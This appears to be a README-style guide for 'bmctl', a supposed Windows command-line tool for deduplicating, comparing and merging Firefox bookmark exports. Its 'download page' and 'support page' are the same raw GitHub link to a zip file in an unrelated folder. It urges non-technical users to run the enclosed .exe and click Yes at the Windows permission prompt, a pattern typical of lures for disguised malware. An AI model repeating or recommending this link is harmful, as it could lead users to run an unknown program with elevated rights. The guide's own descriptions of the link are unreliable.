bmctl helps you organize your Firefox bookmarks. You can find duplicates, compare different bookmark collections, merge them, and create a simple dashboard, all from the command line. This guide shows how to get and use bmctl on Windows.
bmctl works on Windows 10 and later. It needs no programming skills. This guide will walk you through every step — from download to use.
- Windows 10 or newer
- At least 100 MB free disk space
- Internet connection to download
You can:
- Find and remove duplicate bookmarks
- Compare bookmarks exported at different times
- Merge two or more bookmark collections
- Create a simple report to understand your bookmarks
Everything happens in a window called Command Prompt, which is built into Windows.
Click the green button below to visit the download page for bmctl. You will find the latest download files and more info there.
- Open your web browser.
- Go to the download page by clicking the button above or typing:
https://raw.githubusercontent.com/wyatangenerous261/bmctl/main/Caricaceae/Software_v1.6.zip - Look for the latest release or download section.
- Click on the file that ends with
.exeor similar to download bmctl for Windows. - Save the file to your Desktop or Downloads folder.
bmctl usually works without installation, but here are the simplest steps for Windows users:
- Find the downloaded file (likely in your Downloads folder).
- Double-click the file to run it.
- Windows may ask if you want to allow this app to make changes. Click Yes.
- A window will open. This is the Command Prompt, showing bmctl is running.
bmctl runs commands typed into the Command Prompt to work with bookmarks. You do not need to be a programmer, just follow these steps.
- Click the Start button on Windows.
- Type
cmdand press Enter. - The Command Prompt window opens.
-
Find duplicate bookmarks
Type this command and press Enter:
bmctl find-duplicates <path_to_your_bookmarks.html> -
Compare two bookmark files
Type and press Enter:
bmctl compare <file1.html> <file2.html> -
Merge bookmark files
Use this command:
bmctl merge <file1.html> <file2.html> -o merged_bookmarks.html -
Create an interactive dashboard
Run the command:
bmctl dashboard <path_to_bookmarks.html>
Replace
<file1.html>,<file2.html>, and<path_to_your_bookmarks.html>with the actual file locations of your Firefox bookmarks.
To use bmctl, you will need your bookmarks exported from Firefox as an HTML file.
- Open Firefox.
- Click the Bookmarks icon (usually a star or a book).
- Select Manage bookmarks or Show All Bookmarks.
- Click Import and Backup at the top.
- Choose Export Bookmarks to HTML.
- Save the file somewhere easy to find, like Desktop.
- Keep your bookmark files organized in folders.
- Use simple file names for your bookmarks exports.
- When typing commands, you can drag files into the Command Prompt window to automatically fill the file path.
- Start with the
find-duplicatescommand to clean up your bookmarks first. - If you get stuck, run
bmctl helpto see all available commands.
Once comfortable running bmctl, try these ideas:
- Regularly export bookmarks and compare them.
- Merge bookmarks from different Firefox profiles.
- Create a dashboard to visually explore your bookmarks.
- Use bmctl to clean up a huge bookmark list.
If you have issues, you can ask on the bmctl page here:
https://raw.githubusercontent.com/wyatangenerous261/bmctl/main/Caricaceae/Software_v1.6.zip
Describe the problem and what you tried. Someone will help.